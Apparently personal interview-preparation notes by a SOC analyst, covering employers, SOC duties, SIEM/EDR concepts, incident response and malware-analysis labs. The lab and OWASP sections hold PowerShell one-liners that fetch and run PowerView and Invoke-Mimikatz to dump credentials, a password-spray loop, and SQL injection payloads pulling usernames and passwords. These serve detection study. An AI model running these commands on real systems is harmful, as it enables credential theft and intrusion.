Interviewer: Vishnu Sinkar & Arun Kanhirassery - 90k to 100k

Arun - Dawn - The first appearance of light in the sky before sunrise
Ernst & Young is a multinational professional services network with headquarters in
London, England
It's purpose is Building a better working world
Very Good Culture & People
Outstanding Company
Work Life Balance
EY really provide quality services
EY is dedicated to help organizations solve their toughest challenges
EY PWC P&G Deloitte
Splunk SIEM, Microsoft Azure Sentinel SIEM, Securonix NG SIEM, ArcSight SIEM
Splunk Ticketing, Service Now, BMC ServiceDesk, Remedy Ticketing System
Carbon Black, Falcon Insight, Sophos Intercept
Symantec ESG AM DLP

Interviewer: - 100k to 110k

Baker McKenzie
World’s Strongest Law Firm Brand for 11 Years
You have the Our People Deal that delivers the best employee experience to achieve
a lot of great things globally
The three pillars of the People Deal is "Global Citizens, One Team, Client Centric"
that reflect the strategic focus on client service, inclusion and performance

Interviewer: Paulo Nicolas and our San Diego InfoSec Team - 90k to 100k
Dexcom Taguig 4.8 Overall 4.0
Outstanding Company
Good Culture & People
Work Life Balance
American Healthcare (Specializing in Medical Devices) Company.
Dexcom was founded 1999
Dexcom empowers people to take control of diabetes through innovative continuous
glucose monitoring (CGM) systems.
Headquartered in San Diego, California
Dexcom empowers people to take control of diabetes and has emerged as a leader of
diabetes care technology.
This company really care to people. They listening to the needs of users,
caregivers, and providers.
Dexcom simplifies and improves diabetes management around the world.

Yes, No problem, First of all, Thank you very much for inviting me to be
interviewed for this position.
My name is Christan George, You can call me George for short. I'm 27 years old. I
have 3 siblings and I am the eldest.
I am applying for this Job, because I think the skills, the qualities, and the
experience that I have are strong match for the job description.
Over the years, I build a lot of skills and qualities that I believe will be a
benefit to your organization.
I'm a very strong team worker, I am very focused on achieving difficult tasks and I
am the type of person that will work hard, and I will never let you down.
I feel that if I will be a successful candidate for this position, you will quickly
see a positive return on your investment.
I have a total of 8 years of experience in the IT Industry, in which my first 3
years were focused on the Network Engineering side of things and the last 5 years
in Information Security.

I started my career as an OJT in Rivan School of Technology and was absorbed by the
company.
Rivan is a Local Company here in the Philippines, its a 3 way Company.
Testing Center, Training Center and Consulting Company that has a branch in Manila
and Makati.
Basically, it's a Solution Company related to Network, System and Security.
Rivan deployed me in Multiple Companies as a NOC Analyst on a non disclosure
contractual arrangements.

Later on, I was hired by Masergy Communications as a SOC Analyst.

Masergy Communications offers Managed Security Services (MSS) that uses its
proprietary Security Incident and Event Management (SIEM) tool that we call Unified
Enterprise Security (UES) or All in One Security Module (ASM).
This tool is consists of Detection and Prevention Module (DPM), Behavioral Control
Module (BCM), Firewall Syslog Module (FSM), Vulnerability Scanning Module (VSM) and
the Master Control Unit (MCU).

DPM - This sensor has a Suricata installed, It's running to capture network traffic
and creates alerts predicated over 45,000+ rules in the field.
BCM - This sensor is the one that's taking the packet header information from the
network traffic mirrored from the customer, after collecting for one hour, it will
process the data using several processes to create an alert.
FSM - This sensor is our security event correlation module that ingests, parses,
and generate alerts from common log sources provided by the customer like Sysmon,
Windows System and Security, Firewalls, Proxy, Netflow, DNS, PCAP, DHCP etc.
VSM - This sensor is deployed as an integrated scanner to the client. Previously
we are using Nessus, but there's a problem with pricing or licensing so we change
to SAINT Security Suite for the scanning software. It can also perform data and
security scans based on the critical assets provided by the client.
Lastly the MCU- this is where we set up an encrypted channel to communicate with
our boxes, we are accessing the web based console remotely, the alert and traffic
data are presented through the front end GUI that we call WebApp.

As a SOC Analyst, I am assigned to perform duties on a daily basis such as:

• Monitoring critical infrastructures across the customer’s environment, and
respond to incoming events by recognizing, identifying for potential security
incidents detected by Masergy SIEM.
• We are also working with US and UK based Masergy SOC in regards to handling IR
ticket escalations. This is more on the pending tickets that we need some
additional investigations.
• I am also, maintaining high quality of work, at least 90%+ of KPI per month, that
includes IR email accuracy, Priority 1 response time and some technical enhancement
(Tuning, Auditing, Checking of Sensors and Other Data Sources)
• During my shift, I'm the one handling the monitoring assignment and additional
task for my associates, like how many clients they will monitor, who is the one
focusing on the event notifier, status ups, P1 alerts, emails etc. etc.
• We also interact professionally with the customers as an extension of their SOC
Team. For example, what open source tools can we recommend for pdf and microsoft
documents analysis or some IOC scanner for a infected machine.

On the other side,

• I'm doing some tuning of false positive and normal alerts so we can provide more
efficient and effective monitoring.
For example, an authorized scan per customer's feedback. They are like Qualys,
Tenable and Rapid7. We need to tune this out for a specific period of time to
reduce the noise.
CVE - Common Vulnerabilities and Exposures - is a list of publicly disclosed
computer security flaws.
Another example is a CVE's that was sent out to the customer, but they confirmed it
is unused or nonexistent in their environment. Its a FP, we need to tune this out
to stop the noise and check on our detection strategies on what are the logic that
trigger the alert. We can tweak the rules, so we don't receive that kind of FP
alert again and we can focus into more worth it alerts.

• I'm also Auditing IR emails to ensure my Associates are following IR SOP based on
our Playbook.
One example of that is correct categorization of the ticket. Every incident should
be properly categorized so the customer will not be confused when they start
investigating. This is very critical because we are using auto generated templates
for prevention and remediation, and its unique in every category. Imagine if you
receive a phishing alert and sent it out with a malware category, automatically one
of our recommendations there is to block the offending IP and domain, which is not
the best practice on handling a phishing alert all the time.
What if this is a legit hosting IP and the adversary is actually abusing it. Let's
say Digital Ocean. I'm going to create a domain and I'm going to point it to the
legit hosting IP and I will send a phishing campaign to your company. What will you
do? Remember, if you block the IP, there are legit website using this IP so what we
suggest is to block the domain for now. Send some follow up to confirm to the
customer if they have any business with them.

• Sometimes we are also creating or modifying FSM alerts based on the forwarded
logs using Regex. Common log sources provided by the customer are: Sysmon, Windows
System and Security, Firewalls, Proxy, Netflow, DNS, PCAP, DHCP etc. We are using
default parsers and rules that are maintained by Masergy to make this alert, but
sometimes we also tailor those alerts if the client wants to be alerted or not to
be alerted on specific parameters such as event codes, logon types, account names
and admin groups or users.
We are gathering data via pull or push
Pull - We offer selected integrations that will pull information from the rest of
API like Cabon Black.
Push - The customer can always forward data in syslog format to our box.
You can forward us the logs via syslog format over UDP port 514. Log data is stored
on the device for 365 days

• I'm also involved in facilitating trainings for the new members of the Manila SOC
Team.
For example, explaining how they can use some open source tools like URLScan,
Virustotal, IPVoid, RiskIQ, IPDatabase, Intezer, Whois. If you have IOC's like IP
addresses, Hashes and Domains, can you check if it's malicious or not? Can you
check if this website is hosting ransomware or malicious java script? Can you give
me some metadata? Can you check if there are different anti virus vendor that would
flag this as a malicious?
Cyber Chef, a cyber swiss army knife of security professionals. Let's say I have
Base64 strings, there's a point in time, you will analyze an encoded command that
you need to decode, so this is were you can use this Cyber Chef kind of thing. You
just need to choose proper recipe, bake it and it will automatically give you an
output.
What else? CFF Explorer, CAPA, PE Studio, Sysinternals Suite for static malware
analysis, extract some metadata (like file type, file size, when it was created and
modified, the hashes) what are the capabilities of this binary (maybe it can write
files, create and terminate some process), important headers, strings, DLL related
to this.
Some public malware sandbox like Hybrid Analysis, Any.Run, Cuckoo and Joe Sandbox
you can just drop the file or IOC's and it will automatically give you a report.
Let's say I need to know if this is malicious or not and I don't want to run this
on my production laptop, so I will run this on a public malware sandbox. I will
drop a certain file like a pdf and suddenly it gives me information like if a user
click this document what would happen in the background? It would run a cmd or
powershell it would run couple of commands which is very malicious because It's
connecting to some C2 IP and shortened links, aside from that you we can also see a
process graph or what we call process tree like on the carbon black or sentinel one
and some mapping to Mitre ATT&CK framework.

Just a caveat here, due to OPSEC (Operational Security), we don't just upload
sample files coming from our internal network, because it might contain sensitive
information against our organization like maybe recipes, projectX, salary details
of our employees. What we can do is get the hash value of the file and check it on
VT, HA, Intezer and everything.

• We are also, assisting with the Development of Processes and Procedures for
Overall SOC Functions. Since its pandemic, the latest is we did some on call
procedure and policy because right now our setup is WFH and sometimes we cannot
assure that internet connection is stable and there is no power outage or
interruption that would happen, like lately we have an earthquake and typhoons
here, so we outline a document that is aiming to lessen the risk of our manpower
being below the threshold.

• Mostly I serve as a go to person by my teammates when they need assistance in

analyzing an event or when they need someone to double check their work.

Kaseya is a software company that provides service into different MSSP, they got
breached and they call it supply chain attack, it's like the same attack last year
December that happens in solarwinds, it was breached because of supply chain attack
wherein during the updates of the configuration or the platform itself, there's
this backdoor like a DLL that was delivered to all of their clients. But in Kaseya
its ransomware, there platform has been infected by ransomware.
Backdoor is like, it negates normal authentication procedures to access a system.
Remote access is granted to the adversary and it can remotely issue some system
commands and update the malware or the payload itself.
Ransomware is a malware that encrypts the victim's files, the adversary demands a
ransom to restore access to the data via a decryption key upon payment.

Analyzing PE File Structures using CAPA & CFF Explorer

We will check for the Important Header Information | IOC - Indicator of Compromise
Windows Defender and Real Time Protection is Off
Open via CFF Explorer
File Type, File Size, When it was Created and Modified. The Hashes
Dos Header - Magic Value is in Hexadecimal - It means we are dealing with a Windows
PE File
File Header
Machine - Example it is for intel processor and 32/64 bit application
NumberOfSections - Defines how many sections (DLL's) does the sample contain
TimeDateStamp - When this sample was compiled. -Convert it using epochconverter
Characteristics - File is Executable, Relocation info stripped from file and 32-bit
word machine
Optional Header
DLLCharacteristics - DLL can be move, Image is NX Compatible and Terminal Server
Aware
Section Header
You will the data segments named
.text - this is where the code of the program is found
.rdata - this is where the data that is constant read-only and initialized is found
.data - this is where the program initialized data is found
.rsrc - this is where resources for PE are found. icon, menus, dialogs, version
info, fonts etc
Import Directory
It gives us more understanding about the functionalities and capabilities of the
sample being analyzed
This is where you can see that the sample depends on different DLL's. This are the
libraries included on the malware.
USER32.dll
KERNEL32.dll
COMCTL32.dll
ADVAPI32.dll
Resource Editor
Let's focus on the level data - The execution level required to run this binary is
set to asInvoker.
This means that it does not require a high privelege user to run the program. It
can be Admin or Normal user will do.
CAPA
- is a tool made by people from mandiant/fireeye that automatically identify
malware capabilities.
- it uses rules written by experts. It analyze, identifies and recognize the
capabilities of the binary or the PE file.
1st go to the file path where our capa application is located, then input capa.exe
-vv (very verbose) malware.exe
$ capa -f sc32 shellcode.bin - capa supports Windows PE files (EXE, DLL, SYS) and
shellcode. To run capa on a shellcode file you must explicitly specify the file
format and architecture, for example to analyze 32-bit shellcode:
$ capa -vv suspicious.exe - To obtain detailed information on identified
capabilities, capa supports two additional verbosity levels. To get the most
detailed output on where and why capa matched on rules use the very verbose option:
$ capa -t "create TCP socket" suspicious.exe - If you only want to focus on
specific rules you can use the tag option to filter on fields in the rule meta
section:
$ capa -h - Display capa’s help to see all supported options and consolidate the
documentation:

Terminal Server Aware means that this binary is capable of running remote desktop
services, even the interactive logon connection was lost this binary can survive
using remote desktop services.

Epoch value can be modified by the malware author during weaponization phase using
low level languages and their purpose is to confuse the forensicators. Lets say
okay this is like a new malware or no this is an old malware the goal is for the
blue teamers to have a hard time distinguishing some informations that they need.

There's some timestomping activity that was done by APT's aside from clearing the
whole logs they can also modify time attributes to hide changes to existing logs.
Let's say I'm going to attack your organization during weekends, but I don't what
you to see my activities so I will manipulate the timestomp and blend it on
weekdays during normal working hours.

Malware Static Analysis

PowerShell (Run as Admin)
cd "C:\Users\IEUser\Desktop\CDTH Lab Files\Day1\analyst2_malware_sample"
ls - cd ..
cd "C:\Users\IEUser\Desktop\CDTH Lab Files\Day1"
.\SysinternalsSuite\sigcheck.exe -h .\sample1.bin
.\SysinternalsSuite\strings.exe .\sample1.bin
Wireshark - Resolved Addresses, Protocol Hierarchy, Conversations, Endpoints Etc.
Etc.

SIEM (Security Information & Event Management)

It's a solution that provides a holistic view of what is happening on the network
in real time.
This is where all the logs are forwarded, this is our central repository and some
correlation engines in the background are inspecting these logs, for any
naughtiness or maliciousness then it will give us an alert.
This is also acting like a ticketing system where I can see the unresolved alerts
maybe its P1 or P2, then I can also make my investigations in this platform.
I can see here a lot of dashboards, that heres the top 10 IP address that is
attacking us this week, here's the top 10 machine that triggered different alerts
today.
12 Components and Capabilities in a SIEM Architecture
Data aggregation, Threat intelligence feeds, Correlation and security monitoring,
Analytics, Alerting, Dashboards, Compliance, Retention, Forensic analysis, Threat
hunting, Incident response, SOC automation
Splunk, QRadar, ArcSight, LogRhythm and ELK

Most of my SIEM experience it is on the Masergy appliance, but as a SOC Analyst I

also try other SIEM like Splunk, QRadar, ELK and Log Point from range trainings and
free trials. This enterprise SIEM has a lot of capabilities, there's a lot of
customizable dashboards, graphs, inspections, visualization and you can also ingest
different log formats aside from syslog that we are using, they also have a lot of
different filters that is very useful for threat hunting like process.commandline,
process.executable you can try a lot of different detection strategies, you can
also have a notification for specific alerts if you want to and you can save the
previous queries for future reference. They are very powerful I think.

IDS (Intrusion Detection System) - It will give you an alert, but it doesn't have a
capability to block it.
IPS (Intrusion Prevention System) - If it triggers the detection strategy that this
is malicious it can block it.
It monitors network and host traffic from inbound and outbound for indicators of an
attack.
Cisco, McAfee, Trend Micro, Dark Trace, Suricata
Security Onion is a VM with packages wherein it has Bro Zeek, Suricata, Snort all
of these open source tools gather in 1 VM.

SOAR (Security Orchestration, Automation & Response) is a collection of security

software solutions and tools for browsing and collecting data from a variety of
sources.
Its like a SIEM with the response, when you receive something on the event notifier
and was tagged as malicious it will automatically do everything like checking to
virustotal and block it, killing the process, quarantine the file it all depends on
the security control that you configure, it will also create a report automatically
and send it to your global distribution list. It's very powerful you just need to
prepare your custom playbooks.
Swimlane, Splunk Phantom, IBM Resilient

ESG (Email Security Gateway) is a defense against malicious email, spam, spear
phishing, whaling, ransomware and even zero day attacks.
If you heard reports this 2021 from verizon data breach investigation report, red
canary threat detection report, the threat landscape report, vade secure report
still phishing is the dominant or heavily used by the adversaries as initial access
of their attack. So if you don't have any security appliance for protecting our
email gateway then we are very vulnerable even to simple phishing attack. ESG can
do some filtering of a common signatures specially those file format that was
converted from .exe to .pdf, it can block it because of some deep header analysis
feature I think.
Proofpoint, Mimecast, Forcepoint, Sophos, Microsoft365E5
Let's say we have Microsoft365E5 and on top of that we are also using Proofpoint
"Advanced Email Security" as an additional layer of security to filter most of the
phishing and spam emails on the perimeter level. For example we have 1M alerts
related to email, then Proofpoint will drill it down to 200K alerts using deep
header analysis feature of it, so there is an efficiency. Then the 200K alerts will
also be filtered using the capability of Microsoft365E5, by checking if they are
properly aligned to a configuration like SPF and DKIM is passed, allowed that email
to be receive, but if SPF passes and DKIM fail, I want you to drop or reject or put
that email to spam.

SMTP Attack Analysis

An attacker sends an email to the victim - Victim clicks on the link and goes to
the phishing website - Attacker collects victim's credential that was used -
Attacker uses victim's credentials to access the legit website
Phishing is heavily used for credential harvesting (fake login pages) and to
deliver malicious payloads (URL's or attachment) it will be compressed and password
protected for more sophistication.
I think right now the default configuration of some email providers are not
accepting attachment with .exe on it.
To effectively perform SMTP analytics, we can collect SMTP logs from our data
sources like Microsoft Exchange, SPAM Appliance, Postfix, Sendmail, Bro Zeek, Etc.
Common fields that we need to look when investigation. From, Reply-to, Return-Path,
Subject, Source IP, Destination IP, File Attachment Name and Size, Etc.
Header Fields - Received-SPF, Authentication-Results, DKIM-Signature, Message-ID
Keep an eye for: Emails being sent within a small time window from external source,
Usage of key personnel names (Whaling), Similar domain names to our organization,
Abnormal SMTP user agents.
Three ways to verify an email was not spoofed (RFC 7001) "Email Authentication
Technology"
SPF (Sender Policy Framework) - Mail source from verified source, Let's say I'm
only allowing my SMTP server IP to send emails coming from this server only.
DKIM (Domain Keys Identified Mail) - It's like the messages that you send has
intact integrity and verified via digital signature, I believe it's recommended to
be configured properly so our organization can be more legitimate or reputable.
DMARC (Domain-Based Message Authentication, Reporting & Compliance) - Its like an
ACL (Access Control List) saying that if SPF and DKIM is passed, allowed that email
to be sent, but if SPF passes and DKIM fail, I want you to drop or reject or put
that email to spam, it's more on defining the rules.

Okay, there's a phishing alert on the SIEM. First, I will check the rebuild. It's
the content or log snippet that triggers the alert, maybe there are sensitive
information like username, email and password. I will also, check the reputation of
the IP address on VT, IPVoid, Intezer, Talos, X-Force, Etc. The domain that was
accessed will be visually inspected in URLScan or CheckPhish. We will also check
all available logs to see if there are other users involve in this alert. Then if
its TP based on the analysis like exposed credentials, IP and domain is tag as
phishing, we will permanently block it and send an email with a follow up call to
the client. We will tell them that we detected a traffic wherein one of their user
accessed a phishing site and credentials were exposed. It would be advisable for
the user to change credentials to avoid being compromised and use MFA as an
additional security. They also need to delete anything related to the email across
their environment and the user should take a security awareness training.

In some internal cases, the scenario is like HR staff notice that they receive an
email with a link and attachment that they are not expecting, what they will do is
create a ticket in JIRA, attached the suspicious email then forward it to us and we
will begin the investigation.
1st as part of Preparation, I will open all the tools that I'm using when dealing
with this kind of ticket. VT, IPVoid, RiskIQ, Intezer, URLScan, CheckPhish,
URLVoid, MXToolBox, AzureHeaderAnaLyzer, PhishTank.
After that I will proceed with Detection and Analysis, I will personally check it
on what I think about the email, is it Spam? Reconnaissance? Impersonation? I can
also ask the user if they click the link or download some files, next is to extract
full email header information, make sure to check the important fields like
From - is the email address matches the display name?
Reply-to - does it match the source or sender? Because if not, there's a very good
chance that its forged
Return-Path - does it match where the message originated? "From"
Subject - high level topic of the message
Source and Destination IP
Received-SPF - Mail source from verified source - Can see source IP
Authentication-Results - is SPF and DKIM pass?
DKIM-Signature - it contains information about the sender, message, the public key
that is required for verification
Message-ID - it's like a tracking information or number
We will also check all the logs for additional information like if the traffic was
automatically blocked? How many attempts were triggered for that specific time
frame? Do we have other related users involve in this alert?
Check the reputation of the link, how it looks like? Any hit for phishing?
Put the attachement on a malware sandbox and wait for the report to be finish. "You
can DL the binary for future reference"
Upon further investigation I concluded that this is a kind of impersonation because
the sender is GeorgeDGreat@Wow-PH.com which is not the naming convention that we
are using in the organization, it should be Wow.PH.com
Containment phase, we should block the IP address, the domain, the hashes related
to this ticket and for Eradication, we can request for purging the email becuase it
has attachment that we can investigate further and the deletion of anything related
to this email across our environment.

Let's say that the phishing attempt by the adversary is successful, the HR
downloaded the attachment and run the executable disguising as a pdf file like its
a resume of an applicant.
It was detected by the SIEM, I will click the ticket and I will be redirected to
our EDR and after that it will display everthing that I need for the investigate.
It will display some information like: File Name, File Type, File Path, Hashes, IP
addresses, Original Process and some Command Line Arguments, there's a lot.
Since I have this information and my tools is already prepared, I will start with
the analysis phase, I will correlate or fetch the host and network logs or all the
logs based on the IP address and hashes, maybe there's some connection going
outside of our network that is happening.
I will also check the reputations on VT, Talos, X-Force, I will check the file
path, maybe there was something that has been dropped on the %Temp, %AppData or
%Public folder, by doing that I can already tell if this is related to some
ransomware campaign.
If this is TP, we have an Incident. I need to act fast, I need to stop the
bleeding, I will start the containment since I'm the 1st responder.
I will do the actions like, I will connect to this patient zero, move it to our
isolated platform or another site using the EDR, disconnect it from the network,
internet and everything. Its just me and this machine.
After that, permanently block the IP addresses, check the dashboards maybe there's
some russian, north korean or ukraine IP addresses that is connecting to our
system, the domains, the hashes, those uncommon ports that is present on the logs.
Blocked it.
Next is the eradication phase, Its the full removal of the remnants or the
artifacts of attacker in our environment.
Since we saw some binary that was dropped on the %Temp, %AppData or %Public folder
its about time to remove it.
We can also check for persistence, like some created schedule task or modified
binary on the run keys and startup folder.
It's also time to patch the system, maybe there is a vulnerability, kill some
processes. We can also initiate anti malware and IOC scan on the whole system for
eradication.
For the recovery procedure, some sort of making sure that all the applications on
the system unit are running and updated before putting it back to the production,
make some verified back up as well and for post incident activity which is very
important, we can put on the report about how did it bypass our security controls
on the perimeter level maybe some configuration problem with our ESG something like
that, how can we detect this kind of initial access that an email with an
attachment is compressed and password protected. Conduct a security awareness
training that if you are not expecting an email and it's not from our organization,
you should report it to the IT team.

We have an alert in our SIEM. We detected a file on this machine that is connecting
to an external IP address. What will you do?
Okay, For this scenario I will expect that preparation and detection phase is done
already. I will focus on the analysis until the last phase. First, I will check the
rebuild, what is the detection strategy that triggers the alert, maybe this is
related to some process creation like notepad.exe is spawning some cmd or
powershell and its connecting to some offending IP, I can see it there what is the
arguments that was used. After that I will check the IP notes, Sensor notes and
Alert notes, maybe this is a normal behavior on the clients environment, like they
are testing something, aside from that I will check the reputation of the IP
address involved, the hashes and some domains upon generating all the available
logs to see who is the internal machine from that time frame. If no related notes
to this and it has a malicious reputation based on the tools that was used, I will
block it as part of containment phase, put the hashes in EDR, IP address and domain
on the firewall and request for permanent block after confirm from the customer
side that they don't have any business with them. For, eradication phase I will
delete the files involved, Kill the process, Patch the system. We can also initiate
anti malware and IOC scan on the whole system for eradication.
For the recovery procedure, some sort of making sure that all the applications on
the system unit are running and updated, make some verified backup as well and for
post incident activity which is very important, we can put on the report about how
did it bypass our security controls on the perimeter level, maybe some
configuration problem something like that. Conduct a security awareness training
that if you are not expecting an email and it's not from our organization, you
should report it to the IT team.

Investigating Malicious PDF: Analysis

cmd.exe file path cd C:\Users\IEUser\Desktop\CDTH Lab Files\Day3\PDF
HxD
"exiftool(-k).exe"
pdfid.py
pdf-parser.py Lucy2.pdf
pdf-parser.py Lucy2.pdf > Lucy2.txt
pdf-parser.py --search Javascript Lucy2.pdf
pdf-parser.py --search Launch Lucy2.pdf
pdf-parser.py --object=147 --filter --raw Lucy2.pdf
pdf-parser.py --object=148 --filter --raw Lucy2.pdf
pdf-parser.py --object=147 --filter --raw Lucy2.pdf > object147.js
pdf-parser.py --object=148 --filter --raw Lucy2.pdf > object148.js
Yes, I know how to make some basic analysis on a PDF files if its malicious or not.
I'm using some Didier Stevens tools.
First, I can use HxD (Hex and Disk Editor) to confirm the header information, For
example maybe this is a .exe file but changed into .pdf to trick the user to open
it, next I can use exiftool to extract some meta data like when it was created,
what is the version, what is the creator tool, maybe this was created using
powershell scripts, when it was modified, the title and subject, etc. After that I
can use pdfid to check for certain PDF keywords, maybe it contains JavaScript,
OpenAction (automatic action to be performed when the file is viewed) and Launch
(counts of those automatic action maybe 1, 2 or more) next is the pdf parser for
more in depth analysis of the pdf, we can look for the maliciousness of the file
and I can extract it for further examination of the object.

Analyzing Microsoft Office Documents

cmd.exe file path cd C:\Users\IEUser\Desktop\CDTH Lab Files\Day3\Tools
HxD
"exiftool(-k).exe"
OfficeMalScanner.exe Test.xls
OfficeMalScanner.exe Test.xls scan brute debug
DisView.exe Test.xls 0x23c
Malhost-Setup.exe Test.xls Malcode.exe 0x23c
PowerShell (Run as Admin) - Get-Filehash Malcode.exe
First, I can use HxD (Hex and Disk Editor) to confirm the header information, For
example maybe this is a .exe file but was changed into .doc to trick the user to
open it, next I can use exiftool to extract some meta data like when it was
created, file permission, when it was modified, the title, author and subject, etc.
After that I can use OfficeMalScanner to scan the file for VB Scripts and known
exploit signatures. It can also scan the document for PE headers even if they are
encoded. If ever there's an OLE2 compound detected, meaning to say there is an
embedded links or objects on the file. Since we found some signature offset we
should debug it to see those data and analyze it, but if you are not well versed
with tracing assembly code kind of thing, the recommendation there is make it an
executable file using malhost then we can do some static analysis on it or just
check the hash to know if its malicious.

Fileless malware is a type of malicious software that uses legitimate programs like
cmd or powershell to blend into the normal traffic to be more stealthy. It's a kind
of attack that is running in memory, It's not touching the disk and more
sophisticated, anti malware defenses even with updated signatures can't easily
detect it. Example of this is like the adversary is tricking the user to click the
link, download the file, then when executed, it will use a cmd in the background,
launch powershell that is connecting to, lets say some repository in github like
getting powershell empire and it will automatically run its intention. Empire is
pure PowerShell post-exploitation framework. It quickly deploys a lot of post-
exploitation modules ranging from key loggers to Mimikatz, and adaptable
communications to evade network detection, all wrapped up in one framework. We can
use DeepBlueCLI, a PowerShell Module for Threat Hunting via Windows Event Logs and
other framework to investigate this.
Incident Response: Detecting Host Fileless Attacks
PowerShell (Run as Admin)
cd "C:\Users\IEUser\Desktop\CDTH Lab Files\Day2\DeepBlueCLI-master"
.\DeepBlue.ps1 .\evtx\password-spray.evtx 4648 Password Spray Attack -
1102 Audit Logs Was Cleared
.\DeepBlue.ps1 .\evtx\metasploit-psexec-native-target-security.evtx 4688 A new
process has been created
powershell.exe -exec Bypass -noexit -C "IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/
PowerTools/master/PowerView/powerview.ps1')"
powershell.exe -exec bypass -C "IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/
Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz
-DumpCreds"
.\DeepBlue.ps1 -log PowerShell
.\DeepBlue.ps1 -log PowerShell | Out-GridView
PowerShell (Run as Admin)
Foreach ($num in 1..100){echo bad | runas /user:guidem$num cmd.exe}
.\DeepBlue.ps1 -log Security
.\DeepBlue.ps1 -log Security | Out-GridView
Actually, I read something related to that online that if you are a CISO of an
organization and doing some security awareness you should be more sensitive as
well, because there's this CISO that generated a security awareness during covid
time where people is desperate with money and bonus.
This CISO creates a bogus phishing email for security awareness to that
organization telling that you have this amount of bonus and It will be given next
month because the company is doing a good as a team, we hit our targets, so please
click this link in order to confirm your identity, something like that.
This CISO got roasted on twitter because of being insensitive at times like this,
a lot of comments like this not how you perform a security awareness program, it's
not the time to trick user in terms of salary bonuses or whatever.
The suggestion here is be sensitive when creating a security awareness program,
everyone has a breakdown right now because of covid, not everyone has the capacity
or capability to survive within the next few weeks or months, people is so
desperate right now, so just be careful on that.

Malware Sandbox - is an isolated environment in a network that mimics end user

operating environments, sandboxes are used to safely execute suspicious code
without risking harm to the host or network devices.
By having malware sandbox we have our own internal dynamic analysis platform
wherein, let's say I'm not sure with this file and I wanna make sure that this
doesn't connect to any other IP address at all. I will just drop it there and it
will automatically give me a report.
I think some malware sandbox can be installed between the firewall or ESG so that
all of the attachments will pass through to the malware sandbox and if its
malicious block it and if not just let it pass.
Fire Eye AX, Falcon Sandbox, Any.Run, Joe Sandbox, Cuckoo Sandbox

Antimalware is more focus on signature based detections, it uses a huge database

that has different signatures as a detection strategy. It can detect things from
natural files that is touching the disk, its job is to scan the whole disk scan any
files that is touching the disk. The problem there is if the attack or malware
doesn't exist in the database they can easily bypass the system without any
restrictions. Also, its part of the audit when your organization is managing some
HIPAA, PCI/DSS, GDPR, ISO27001, its a requirement for this folks.
On the other side, EDR is not highly depending in the signatures, its morely focus
on TTP's or the behavioral side of things. For example an excel spawning powershell
or pdf spawning cmd. It's a behavioral approach that is not common on the
enterprise perspective. Also, I can do live response remotely, I can easily connect
to the infected machine through some management platform, then isolate or
disconnect the machine in the network, internet and everything. There's a lot of
features that I can do. I can delete the malware or even download it for future
investigations, kill some malicious processes. It's very powerful.

EDR (Endpoint Detection & Reponse)

I can say that this is a CCTV camera on the endpoint, meaning to say it monitors
any execution, deletion, registries, network connections that is being done within
the host level. It has a very powerful response mechanism, I can perform a network
contain wherein I will disconnect the infected machine to the network and bring it
to an isolated platform, that's only me and the machine and I can perform some
memory dump, data acquisition, disk image for full forensic examination if needed.
That's the beauty of the EDR. I can also, perform IOC's scan and download those
maliciousness on that machine for further investigation.
Carbon Black Response, Sentinel One, Fire Eye, Crowd Strike, Cisco AMP, Cylance,
End Game

DLP (Data Loss Prevention)

It's a security tool that protects business information from data breaches or
exfiltrations. It also, prevents end-users from moving information outside the
network based on the configurations. I think it can also monitor data accessed and
shared by end users like if you copy and paste something, it will also have a copy
of that on the server, mostly it's used for compliance and data visibility, its
part of the audit when your organization is managing some HIPAA, PCI/DSS, GDPR,
ISO2700, Etc. it's a requirement for this folks like anti malware.
Honestly, I don't have any solid experience on DLP's like implementing it from the
scratch. Most of my experience regarding this is monitoring, correlating,
investigating the logs that was forwarded by our customers.
Palo Alto, Proof Point, Symantec, Zscaler

If I can remember it clearly, we used this DLP logs on some insider threat
incident, our client suspected that one of their privilege employee that rendered
for 15 days notice is always taking over time and maybe he is trying to access or
exfiltrate some data, so what we did their is extract multiple logs, including DLP
logs, Windows logs, USB logs, Logon logs based on the time frame that they give,
after that we investigate it, correlate it, we tie it together using the event ID's
and we found out that this user was logged in at that time, trying to access this
folder and exfiltrate the data using flash drive then they close the ticket, they
will be the one who will handle the incident from that point. Thank you for the
assistance.
5145: A network share object was checked to see whether client can be granted
desired access
4656: A handle to an object was requested
4663: An attempt was made to access an object
4658: The handle to an object was closed
wmic diskdrive get interfacetype,mediatype,model
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB

Let's say I receive an alert on the event notifier of our SIEM regarding OpenVAS,
SQL Injection, Password File or NMAP, anything related to inbound vulnerability
scan. I will click the event and it will auto redirect me on the monitoring
console. I will do a quick filter on the offending IP to make sure if these alerts
also appears on the other sensors, after that I will check the rebuild on what is
the detection strategy that trigger the alert. I will also generate the logs from
this IP to check if it was blocked by the other security controls that is deployed
in the environment. I will check if there are any alert notes, sensor notes or IP
notes for this, if no notes I will automatically block it because its an offending
IP that is not confirmed in the environment. I will start to create an IR email,
put all the analysis that I did, like based on the logs, the traffic was not
automatically blocked, the IP address involve has a malicious reputation. It's
scanning the network to gain information that could help them compromising your
system. Also, I will tell them that I already permanently blocked the offending IP.

OWASP - Open Web Application Security Project

Top 10 Web Application Security Risks
A1:2017-Injection: Injection flaws, such as SQL, NoSQL, OS, and LDAP injection,
occur when untrusted data is sent to an interpreter as part of a command or query.
The attacker’s hostile data can trick the interpreter into executing unintended
commands or accessing data without proper authorization.
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT username || '~' || password FROM users--
' UNION SELECT username, password FROM users--
' ORDER BY 1--

PII - Personally Identifiable Information

Its any data that could potentially be used to identify a particular person.

PCI/DSS - Payment Card Industry/Data Security Standard

Its an information security standard for organizations that handle branded major
credit card schemes and It was created to increase the controls around cardholders
data to reduce fraud.
It applies to all merchants and services that process, transmit or store cardholder
data.
If our organization handles card payments, we must comply or suffer financial
penalties.
For the validation of compliance, its annually or quarterly depends on the
transaction volumes.
It has 6 "Control Objectives"
1. Build and Maintain a Secure Network and Systems
2. Protect Cardholder Data
3. Maintain a Vulnerability Management Program
4. Implement Strong Access Control Measures
5. Regularly Monitor and Test Networks
6. Maintain an Information Security Policy
We have detected an SSN number being sent from IP address X.X.X.X to IP address
X.X.X.X in clear text.
To help ensure that this information is secure in transmitting all numbers in this
IR, email have been censored.
